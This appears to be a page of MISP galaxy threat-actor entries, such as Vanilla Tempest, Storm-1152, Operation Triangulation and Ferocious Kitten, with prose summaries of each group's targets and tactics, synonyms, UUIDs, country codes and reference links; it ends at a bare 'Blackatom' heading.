Vice Society is a ransomware group that has been active since at least June 2021. They primarily target the education and healthcare sectors, but have also been observed targeting the manufacturing industry. The group has used multiple ransomware families and has been known to utilize PowerShell scripts for their attacks. There are similarities between Vice Society and the Rhysida ransomware group, suggesting a potential connection or rebranding.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vanilla Tempest.
Known Synonyms |
---|
DEV-0832 |
Vice Society |
Internal MISP references
UUID c4132d43-2405-43ca-9940-a6f78e007861
which can be used as unique global reference for Vanilla Tempest
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/ - webarchive
- https://fourcore.io/blogs/rhysida-ransomware-history-ttp-adversary-emulation - webarchive
- https://detect.fyi/rhysida-ransomware-and-the-detection-opportunities-3599e9a02bb2 - webarchive
- https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Lilac Typhoon
Lilac Typhoon is a threat actor attributed to China. They have been identified as exploiting the Atlassian Confluence RCE vulnerability CVE-2022-26134, which allows for remote code execution. This vulnerability has been used in cryptojacking campaigns and is included in commercial exploit frameworks. Lilac Typhoon has also been involved in deploying various payloads such as Cobalt Strike, web shells, botnets, coin miners, and ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lilac Typhoon.
Known Synonyms |
---|
DEV-0234 |
Internal MISP references
UUID b80be7a7-6d06-4da7-8ae0-302a198e7c73
which can be used as unique global reference for Lilac Typhoon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Ruby Sleet
Ruby Sleet is a threat actor linked to North Korea's Ministry of State Security. Cerium has been involved in spear-phishing campaigns, compromising devices, and conducting cyberattacks alongside other North Korean threat actors. They have also targeted companies involved in COVID-19 research and vaccine development.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ruby Sleet.
Known Synonyms |
---|
CERIUM |
Internal MISP references
UUID 03ff54cf-f7d4-4606-a531-2ca6d4fa6a54
which can be used as unique global reference for Ruby Sleet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | KP |
Raspberry Typhoon
Microsoft has tracked Raspberry Typhoon (RADIUM) as the primary threat group targeting nations that ring the South China Sea. Raspberry Typhoon consistently targets government ministries, military entities, and corporate entities connected to critical infrastructure, particularly telecoms. Since January 2023, Raspberry Typhoon has been particularly persistent. When targeting government ministries or infrastructure, Raspberry Typhoon typically conducts intelligence collection and malware execution. In many countries, targets vary from defense and intelligence-related ministries to economic and trade-related ministries
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Raspberry Typhoon.
Known Synonyms |
---|
RADIUM |
Internal MISP references
UUID 37f012df-54d8-4b3d-a288-af47240430ea
which can be used as unique global reference for Raspberry Typhoon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Phlox Tempest
Phlox Tempest is a threat actor responsible for a large-scale click fraud campaign targeting users through YouTube comments and malicious ads. They use ChromeLoader to infect victims' computers with malware, often delivered as ISO image files that victims are tricked into downloading. The attackers aim to profit from clicks generated by malicious browser extensions or node-WebKit installed on the victim's device. Microsoft and other cybersecurity organizations have issued warnings about this ongoing and prevalent campaign.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Phlox Tempest.
Known Synonyms |
---|
DEV-0796 |
Internal MISP references
UUID dd012c50-4f4f-4485-ac52-294a341f03e5
which can be used as unique global reference for Phlox Tempest
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-1295
Storm-1295 is a threat actor group that operates the Greatness phishing-as-a-service platform. They utilize synchronous relay servers to present targets with a replica of a sign-in page, resembling traditional phishing attacks. Their adversary-in-the-middle capability allows Storm-1295 to offer their services to other attackers. Active since mid-2022, Storm-1295 is tracked by Microsoft and is known for their involvement in the Greatness PhaaS platform.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1295.
Known Synonyms |
---|
DEV-1295 |
Internal MISP references
UUID 5f485e47-18ad-4302-85a1-0a390fe90dc1
which can be used as unique global reference for Storm-1295
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-1167
Storm-1167 is a threat actor tracked by Microsoft, known for their use of an AiTM phishing kit. They were responsible for launching an attack that led to Business Email Compromise activity.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1167.
Known Synonyms |
---|
DEV-1167 |
Internal MISP references
UUID 17fb8267-44a3-405b-b6b9-ba7fdeb56693
which can be used as unique global reference for Storm-1167
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | ID |
Opal Sleet
Konni is a threat actor associated with APT37, a North Korean cyber crime group. They have been active since 2012 and are known for their cyber-espionage activities. Konni has targeted various sectors, including education, government, business organizations, and the cryptocurrency industry. They have exploited vulnerabilities such as CVE-2023-38831 and have used malware like KonniRAT to gain control of victim hosts and steal important information.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Opal Sleet.
Known Synonyms |
---|
Konni |
OSMIUM |
Vedalia |
Internal MISP references
UUID 5f71a9ea-511d-4fdd-9807-271ef613f488
which can be used as unique global reference for Opal Sleet
in MISP communities and other software using the MISP galaxy
External references
- https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/ - webarchive
- https://paper.seebug.org/3031/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-konni-apt-group-active-iocs-11 - webarchive
- https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/ - webarchive
- https://gbhackers.com/vedalia-apt-group-exploits/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | KP |
Storm-1044
Storm-1044 has been identified as part of a cyber campaign in collaboration with Twisted Spider. They employ a strategic approach, targeting specific endpoints using an initial access trojan called DanaBot. Once they gain access, Storm-1044 initiates lateral movement through Remote Desktop Protocol sign-in attempts, passing control to Twisted Spider. Twisted Spider then compromises the endpoints by introducing the CACTUS ransomware. Microsoft has detected ongoing malvertising attacks involving Storm-1044, leading to the deployment of CACTUS ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1044.
Known Synonyms |
---|
DEV-1044 |
Internal MISP references
UUID 5ec7a98e-9725-4f87-8a6e-91e2b4ba04ac
which can be used as unique global reference for Storm-1044
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Pink Sandstorm
Agonizing Serpens is an Iranian-linked APT group that has been active since 2020. They are known for their destructive wiper and fake-ransomware attacks, primarily targeting Israeli organizations in the education and technology sectors. The group has strong connections to Iran's Ministry of Intelligence and Security and has been observed using various tools and techniques to bypass security measures. They aim to steal sensitive information, including PII and intellectual property, and inflict damage by wiping endpoints.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pink Sandstorm.
Known Synonyms |
---|
AMERICIUM |
Agonizing Serpens |
Agrius |
BlackShadow |
DEV-0022 |
Internal MISP references
UUID 0876c327-c82a-45f7-82fa-267c312ceb05
which can be used as unique global reference for Pink Sandstorm
in MISP communities and other software using the MISP galaxy
External references
- https://www.oodaloop.com/archive/2024/01/02/critical-infrastructure-remains-the-brass-ring-for-cyber-attackers-in-2024/ - webarchive
- https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/ - webarchive
- https://socprime.com/blog/agonizing-serpens-attack-detection-iran-backed-hackers-target-israeli-tech-firms-and-educational-institutions/ - webarchive
- https://therecord.media/iran-linked-hackers-target-israel-education-tech-sectors - webarchive
- https://www.enigmasoftware.com/moneybirdransomware-removal/ - webarchive
- https://research.checkpoint.com/2023/agrius-deploys-moneybird-in-targeted-attacks-against-israeli-organizations/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Storm-1084
Storm-1084 is a threat actor that has been observed collaborating with the MuddyWater group. They have used the DarkBit persona to mask their involvement in targeted attacks. Storm-1084 has been linked to destructive actions, including the encryption of on-premise devices and deletion of cloud resources. They have been observed using tools such as Rport, Ligolo, and a customized PowerShell backdoor. The extent of their autonomy or collaboration with other Iranian threat actors is currently unclear.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1084.
Known Synonyms |
---|
DEV-1084 |
Internal MISP references
UUID 2cc32087-f242-4091-8634-4554635b7a58
which can be used as unique global reference for Storm-1084
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Storm-1099
Storm-1099 is a sophisticated Russia-affiliated influence actor that has been conducting pro-Russia influence operations targeting international supporters of Ukraine since Spring 2022. They are known for their website forgery operation called "Doppelganger" and have been actively spreading false information. They have been involved in pushing the claim that Hamas acquired Ukrainian weapons for an attack on Israel. Storm-1099 has also been implicated in amplifying images of graffiti in Paris, suggesting possible Russian involvement and aligning with Russia's Active Measures playbook.
Internal MISP references
UUID b05a2a56-08dc-4827-9aef-aaade91016a4
which can be used as unique global reference for Storm-1099
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Storm-1286
Storm-1286 is a threat actor that engages in large-scale spamming activities, primarily targeting user accounts without multifactor authentication enabled. They employ password spraying attacks to compromise these accounts and utilize legacy authentication protocols like IMAP and SMTP. In the past, they have attempted to compromise admin accounts and create new LOB applications with high administrative permissions to spread spam. Despite previous actions taken by Microsoft Threat Intelligence, Storm-1286 continues to explore new methods to establish a high-scale spamming platform within victim organizations using non-privileged users.
Internal MISP references
UUID 375988ab-91b9-419e-8646-a4783b931288
which can be used as unique global reference for Storm-1286
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-1101
DEV-1101 is a threat actor tracked by Microsoft who is responsible for developing and advertising phishing kits, specifically AiTM phishing kits. These kits are capable of bypassing multifactor authentication and are available for purchase or rent by other cybercriminals. DEV-1101 offers an open-source kit with various enhancements, such as mobile device management and CAPTCHA evasion. Their tool has been used in high-volume phishing campaigns by multiple actors, including DEV-0928, and is sold for $300 with VIP licenses available for $1,000.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1101.
Known Synonyms |
---|
DEV-1101 |
Internal MISP references
UUID 8081af2c-442f-4487-9cf7-022cbe010b8f
which can be used as unique global reference for Storm-1101
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-0381
Storm-0381 is a threat actor identified by Microsoft as a Russian cybercrime group. They are known for their use of malvertising to deploy Magniber, a type of ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-0381.
Known Synonyms |
---|
DEV-0381 |
Internal MISP references
UUID 874860fe-5aee-4c94-aee1-2166c225c41e
which can be used as unique global reference for Storm-0381
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Storm-0530
H0lyGh0st is a North Korean threat actor that has been active since June 2021. They are responsible for developing and deploying the H0lyGh0st ransomware, which targets small-to-medium businesses in various sectors. The group employs "double extortion" tactics, encrypting data and threatening to publish it if the ransom is not paid. There are connections between H0lyGh0st and the PLUTONIUM APT group, indicating a possible affiliation.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-0530.
Known Synonyms |
---|
DEV-0530 |
H0lyGh0st |
Internal MISP references
UUID 47945864-c233-46e7-8b96-b427b97b0ebf
which can be used as unique global reference for Storm-0530
in MISP communities and other software using the MISP galaxy
External references
- https://ics-cert.kaspersky.com/publications/reports/2023/03/24/apt-attacks-on-industrial-organizations-in-h2-2022/ - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a - webarchive
- https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware - webarchive
- https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/ - webarchive
- https://www.picussecurity.com/resource/h0lygh0st-north-korean-threat-group-strikes-back-with-new-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | KP |
Storm-0539
Storm-0539 is a financially motivated threat actor that has been active since at least 2021. They primarily target retail organizations for gift card fraud and theft. Their tactics include phishing via emails or SMS to distribute malicious links that redirect users to phishing pages designed to steal credentials and session tokens. Once access is gained, Storm-0539 registers a device for secondary authentication prompts, bypassing multi-factor authentication and gaining persistence in the environment. They also collect emails, contact lists, and network configurations for further attacks against the same organizations.
Internal MISP references
UUID 760b350c-522e-432d-80c5-7aab0eaf8873
which can be used as unique global reference for Storm-0539
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-1152
Storm-1152, a cybercriminal group, was recently taken down by Microsoft for illegally reselling Outlook accounts. They operated by creating approximately 750 million fraudulent Microsoft accounts and earned millions of dollars in illicit revenue. Storm-1152 also offered CAPTCHA-solving services and was connected to ransomware and extortion groups. Microsoft obtained a court order to seize their infrastructure and domains, disrupting their operations.
Internal MISP references
UUID e18dca82-0524-4338-9a66-e13e67c81ac4
which can be used as unique global reference for Storm-1152
in MISP communities and other software using the MISP galaxy
External references
- https://securityboulevard.com/2023/12/microsoft-storm-1152-crackdown-stopping-threat-actors/ - webarchive
- https://blogs.microsoft.com/on-the-issues/2023/12/13/cybercrime-cybersecurity-storm-1152-fraudulent-accounts/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-update-microsoft-warns-of-emerging-threat-by-storm-0539-behind-gift-card-frauds/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | VN |
Storm-1567
Storm-1567 is the threat actor behind the Ransomware-as-a-Service Akira. They attacked Swedish organizations in March 2023. This ransomware utilizes the ChaCha encryption algorithm, PowerShell, and Windows Management Instrumentation (WMI). Microsoft's Defender for Endpoint successfully blocked a large-scale hacking campaign carried out by Storm-1567, highlighting the effectiveness of their security solution.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1567.
Known Synonyms |
---|
Akira |
Internal MISP references
UUID 3a912680-6f38-4fe7-9941-744f0e2280b3
which can be used as unique global reference for Storm-1567
in MISP communities and other software using the MISP galaxy
External references
- https://news.sophos.com/en-us/2023/12/20/cryptoguard-an-asymmetric-approach-to-the-ransomware-battle/ - webarchive
- https://securelist.com/crimeware-report-fakesg-akira-amos/111483/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/akira-ransomware.html - webarchive
- https://blog.sekoia.io/sekoia-io-mid-2023-ransomware-threat-landscape - webarchive
- https://decoded.avast.io/threatresearch/avast-q2-2023-threat-report/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Storm-0829
Nwgen is a group that focuses on data exfiltration and ransomware activities. They have been found to share techniques with other threat groups such as Karakurt, Lapsus$, and Yanluowang. Nwgen has been observed carrying out attacks and deploying ransomware, encrypting files and demanding a ransom of $150,000 in Monero cryptocurrency for the decryption software.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-0829.
Known Synonyms |
---|
DEV-0829 |
Nwgen Team |
Internal MISP references
UUID 3e595289-05b8-43fc-bd88-f8650436447f
which can be used as unique global reference for Storm-0829
in MISP communities and other software using the MISP galaxy
External references
- https://www.enigmasoftware.com/nwgenransomware-removal/ - webarchive
- https://www.databreaches.net/east-tennessee-childrens-hospital-updates-information-on-ransomware-incident/ - webarchive
- https://readme.security/cybercrime-is-more-of-a-threat-than-nation-state-hackers-6f6cccf47721 - webarchive
- https://twitter.com/cglyer/status/1546297609215696897 - webarchive
Associated metadata
Metadata key | Value |
---|---|
Storm-1674
Storm-1674 is an access broker known for using tools based on the publicly available TeamsPhisher tool to distribute DarkGate malware. Storm-1674 campaigns have typically relied on phishing lures sent over Teams with malicious attachments, such as ZIP files containing a LNK file that ultimately drops DarkGate and Pikabot. In September 2023, Microsoft observed handoffs from Storm-1674 to ransomware operators that have led to Black Basta ransomware deployment.
Internal MISP references
UUID eb7b5ed7-cf9d-4c72-8f89-a2ee070b89b6
which can be used as unique global reference for Storm-1674
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-0835
Cybercriminals have launched a phishing campaign targeting senior executives in U.S. firms, using the EvilProxy phishing toolkit for credential harvesting and account takeover attacks. This campaign, initiated in July 2023, primarily targets sectors such as banking, financial services, insurance, property management, real estate, and manufacturing. The attackers exploit an open redirection vulnerability on the job search platform "indeed.com," redirecting victims to malicious phishing pages impersonating Microsoft. EvilProxy functions as a reverse proxy, intercepting credentials, two-factor authentication codes, and session cookies to hijack accounts. The threat actors, known as Storm-0835 by Microsoft, have hundreds of customers who pay monthly fees for their services, making attribution difficult. The attacks involve sending phishing emails with deceptive links to Indeed, redirecting victims to EvilProxy pages for credential harvesting.
Internal MISP references
UUID 2da09284-be56-49cd-ad18-993a6eb17af2
which can be used as unique global reference for Storm-0835
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-1575
Storm-1575 is a threat actor identified by Microsoft as being involved in phishing campaigns using the Dadsec platform. They utilize hundreds of Domain Generated Algorithm domains to host credential harvesting pages and target global organizations to steal Microsoft 365 credentials.
Internal MISP references
UUID 2485a9cb-b41c-43bd-8b1c-c64e919c0a4e
which can be used as unique global reference for Storm-1575
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA2552
Since January 2020, Proofpoint researchers have tracked an actor abusing Microsoft Office 365 (O365) third-party application (3PA) access, with suspected activity dating back to August 2019. The actor, known as TA2552, uses well-crafted Spanish language lures that leverage a narrow range of themes and brands. The lures entice users to click a link in the message, taking them to the legitimate Microsoft third-party apps consent page. There they are prompted to grant a third-party application read-only user permissions to their O365 account via OAuth2 or other token-based authorization methods. TA2552 seeks access to specific account resources like the user’s contacts and mail. Requesting read-only permissions for such account resources could be used to conduct account reconnaissance, silently steal data, or to intercept password reset messages from other accounts such as those at financial institutions. While organizations with global presence have received messages from this group, they appear to choose recipients who are likely Spanish speakers.
Internal MISP references
UUID e9de47f0-3e68-465c-b91e-7a2b7371955c
which can be used as unique global reference for TA2552
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA2722
TA2722 is a highly active threat actor that targets various industries including Shipping/Logistics, Manufacturing, Business Services, Pharmaceutical, and Energy. They primarily focus on organizations in North America, Europe, and Southeast Asia. This threat actor impersonates Philippine government entities and uses themes related to the government to gain remote access to target computers. Their objectives include information gathering, installing follow-on malware, and engaging in business email compromise activities.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA2722.
Known Synonyms |
---|
Balikbayan Foxes |
Internal MISP references
UUID 625c3fb4-16fc-4992-9ff2-4fad869750ac
which can be used as unique global reference for TA2722
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA2719
In late March 2020, Proofpoint researchers began tracking a new actor with a penchant for using NanoCore and later AsyncRAT, popular commodity remote access trojans (RATs). Dubbed TA2719 by Proofpoint, the actor uses localized lures with colorful images that impersonate local banks, law enforcement, and shipping services. Proofpoint has observed this actor send low volume campaigns to recipients in Austria, Chile, Greece, Hungary, Italy, North Macedonia, Netherlands, Spain, Sweden, Taiwan, United States, and Uruguay.
Internal MISP references
UUID 33bfb09d-c6f4-4403-b434-1d4d4733ec52
which can be used as unique global reference for TA2719
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Karkadann
Karkadann is a threat actor that has been active since at least October 2020, targeting government bodies and news outlets in the Middle East. They have been involved in watering hole attacks, compromising high-profile websites to inject malicious JavaScript code. The group has been linked to another commercial spyware company called Candiru, suggesting they may utilize multiple spyware technologies. There are similarities in the infrastructure and tactics used by Karkadann in their campaigns.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Karkadann.
Known Synonyms |
---|
Piwiks |
Internal MISP references
UUID 8146ba06-cef2-4a94-b26e-1a4041e04c7d
which can be used as unique global reference for Karkadann
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Tomiris
Tomiris is a threat actor that has been active since at least 2019. They primarily target government and diplomatic entities in the Commonwealth of Independent States region, with occasional victims in other regions being foreign representations of CIS countries. Tomiris uses a wide variety of malware implants, including downloaders, backdoors, and file stealers, developed in different programming languages. They employ various attack vectors such as spear-phishing, DNS hijacking, and exploitation of vulnerabilities. There are potential ties between Tomiris and Turla, but they are considered separate threat actors with distinct targeting and tradecraft by Kaspersky.
Internal MISP references
UUID 2f854548-1af0-4f55-acab-4f85ce9f162c
which can be used as unique global reference for Tomiris
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ShaggyPanther
ShaggyPanther is a threat actor that primarily targets government entities in Taiwan and Malaysia. They have been active since 2008 and utilize hidden encrypted payloads in registry keys. Their activities have been detected in various locations, including Indonesia and Syria.
Internal MISP references
UUID 07791d89-64b6-46df-9f67-ccde8c2cbb20
which can be used as unique global reference for ShaggyPanther
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Fishing Elephant
Fishing Elephant is a threat actor that primarily targets victims in Bangladesh and Pakistan. They rely on consistent TTPs, including payload and communication patterns, while occasionally incorporating new techniques such as geo-fencing and hiding executables within certificate files. Their tool of choice is AresRAT, which they deliver through platforms like Heroku and Dropbox. Recently, they have shifted their focus to government and diplomatic entities in Turkey, Pakistan, Bangladesh, Ukraine, and China.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Fishing Elephant.
Known Synonyms |
---|
Outrider Tiger |
Internal MISP references
UUID 0df34184-4ccf-4357-8e8e-e990058d2992
which can be used as unique global reference for Fishing Elephant
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/apt-trends-report-q1-2020/96826/ - webarchive
- https://securelist.com/apt-trends-report-q1-2022/106351/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
RevengeHotels
RevengeHotels is a targeted cybercrime campaign that has been active since 2015, primarily targeting hotels, hostels, and tourism companies. The threat actor uses remote access Trojan malware to infiltrate hotel front desks and steal credit card data from guests and travelers. The campaign has impacted hotels in multiple countries, including Brazil, Argentina, Chile, and Mexico. The threat actor employs social engineering techniques and sells credentials from infected systems to other cybercriminals for remote access.
Internal MISP references
UUID 083acee6-6969-4c74-80c2-5d442936aa97
which can be used as unique global reference for RevengeHotels
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GhostEmperor
GhostEmperor is a Chinese-speaking threat actor that targets government entities and telecom companies in Southeast Asia. They employ a Windows kernel-mode rootkit called Demodex to gain remote control over their targeted servers. The actor demonstrates a high level of sophistication and uses various anti-forensic and anti-analysis techniques to evade detection. They have been active for a significant period of time and continue to pose a threat to their targets.
Internal MISP references
UUID 3c3ca8f3-c6ab-4c5d-9bd0-be6677d6cdeb
which can be used as unique global reference for GhostEmperor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Operation Triangulation
Operation Triangulation is an ongoing APT campaign targeting iOS devices with zero-click iMessage exploits. The threat actor behind the campaign has been active since at least 2019 and continues to operate. The attack chain involves the delivery of a malicious iMessage attachment that launches a series of exploits, ultimately leading to the deployment of the TriangleDB implant. Kaspersky researchers have discovered and reported multiple vulnerabilities used in the campaign, with patches released by Apple.
Internal MISP references
UUID 220001c6-c976-4cad-a356-4d8c2dd2b1c1
which can be used as unique global reference for Operation Triangulation
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/operation-triangulation-the-last-hardware-mystery/111669/ - webarchive
- https://securelist.com/operation-triangulation-catching-wild-triangle/110916/ - webarchive
- https://securelist.com/triangulation-validators-modules/110847/ - webarchive
- https://securelist.com/operation-triangulation/109842/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Operation Ghoul
Operation Ghoul is a profit-driven threat actor that targeted over 130 organizations in 30 countries, primarily in the industrial and engineering sectors. They employed high-quality social engineering techniques, such as spear-phishing emails disguised as payment advice from a UAE bank, to distribute malware. The group's main motivation is financial gain through the sale of stolen intellectual property and business intelligence, as well as attacks on banking accounts. Their attacks were effective, particularly against companies that were unprepared to detect them.
Internal MISP references
UUID 624cc006-1131-4e53-a53c-3958cfbe233f
which can be used as unique global reference for Operation Ghoul
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
CardinalLizard
CardinalLizard, a cyber threat actor linked to China, has targeted entities in Asia since 2018. Their methods include spear-phishing, custom malware with anti-detection features, and potentially shared infrastructure with other actors.
Internal MISP references
UUID 97f40858-1582-4a59-a990-866813982830
which can be used as unique global reference for CardinalLizard
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Ferocious Kitten
Ferocious Kitten is an APT group that has been active against Persian-speaking individuals since 2015 and appears to be based in Iran. Although it has been active over a large timespan, the group has mostly operated under the radar until a lure document was uploaded to VirusTotal and was brought to public knowledge by researchers on Twitter. Subsequently, one of its implants was analyzed by a Chinese intelligence firm. Kaspersky then expanded some of the findings on the group and provided insights on additional variants. The malware dropped from the aforementioned document is dubbed MarkiRAT and is used to record keystrokes and clipboard content, provide file download and upload capabilities as well as the ability to execute arbitrary commands on the victims machine. Kaspersky were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method. Interestingly, some of the TTPs used by this threat actor are reminiscent of other groups operating in the domain of dissident surveillance. For example, it used the same C2 domains across its implants for years, which was witnessed in the activity of Domestic Kitten. In the same vein, the Telegram execution hijacking technique observed in this campaign by Ferocious Kitten was also observed being used by Rampant Kitten, as covered by Check Point.
Internal MISP references
UUID f34962a4-a792-4f23-af23-a8bf0f053fcf
which can be used as unique global reference for Ferocious Kitten
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Operation Red Signature
The threat actors compromised the update server of a remote support solutions provider to deliver a remote access tool called 9002 RAT to their targets of interest through the update process. They carried this out by first stealing the company’s certificate then using it to sign the malware. They also configured the update server to only deliver malicious files if the client is located in the range of IP addresses of their target organisations.
Internal MISP references
UUID 3e9b98d9-0c61-4050-bafa-486622de0080
which can be used as unique global reference for Operation Red Signature
in MISP communities and other software using the MISP galaxy
External references
- https://decoded.avast.io/threatintel/avast-finds-backdoor-on-us-government-commission-network/?utm_source=rss&utm_medium=rss&utm_campaign=avast-finds-backdoor-on-us-government-commission-network - webarchive
- https://www.trendmicro.com/en_my/research/18/h/supply-chain-attack-operation-red-signature-targets-south-korean-organizations.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Earth Yako
Earth Yako is a threat actor that has been actively targeting researchers in academic organizations and think tanks in Japan. They use spearphishing emails with malicious attachments to gain initial access to their targets' systems. Earth Yako's objectives and patterns suggest a possible connection to a Chinese APT group, but conclusive proof of their nationality is lacking. They have been observed using various malware delivery methods and techniques, such as the use of Winword.exe for DLL Hijacking.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Earth Yako.
Known Synonyms |
---|
Enelink |
Operation RestyLink |
Internal MISP references
UUID 2875aff1-2a0f-4e82-ae42-607a3a74d129
which can be used as unique global reference for Earth Yako
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Urpage
What sets Urpage attacks apart is its targeting of InPage, a word processor for Urdu and Arabic languages. However, its Delphi backdoor component, which it has in common with Confucius and Patchwork, and its apparent use of Bahamut-like malware, is what makes it more intriguing as it connects Urpage to these other known threats. Trend Micro covered the Delphi component in the context of the Confucius and Patchwork connection. They mentioned Urpage as a third unnamed threat actor connected to the two.
Internal MISP references
UUID 4e137d53-b9cf-4b9a-88c2-f29dd27ac302
which can be used as unique global reference for Urpage
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Operation Emmental
Operation Emmental, also known as the Retefe gang, is a threat actor group that has been active since at least 2012. They primarily target customers of banks in countries such as Austria, Sweden, Switzerland, and Japan. The group has developed sophisticated malware, including a Mac alternative called Dok, to bypass two-factor authentication and hijack network traffic. They have also been observed using phishing emails to spread their malware. The group is believed to be Russian-speaking and has continuously improved their malicious codes over the years.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Operation Emmental.
Known Synonyms |
---|
Retefe Gang |
Retefe Group |
Internal MISP references
UUID a1527821-fe84-44ec-ad29-8d3040463bc9
which can be used as unique global reference for Operation Emmental
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
TA2725
TA2725 is a threat actor that has been tracked since March 2022. They primarily target organizations in Brazil and Mexico using Brazilian banking malware and phishing techniques. Recently, they have expanded their operations to also target victims in Spain and Mexico simultaneously. TA2725 typically uses GoDaddy virtual hosting for their URL redirector and hosts malicious files on legitimate cloud hosting providers like Amazon AWS, Google Cloud, or Microsoft Azure. They have been known to spoof legitimate companies, such as ÉSECÈ Group, to deceive their victims.
Internal MISP references
UUID 1697dace-fe21-452c-acee-bef62fc5e386
which can be used as unique global reference for TA2725
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Blackatom
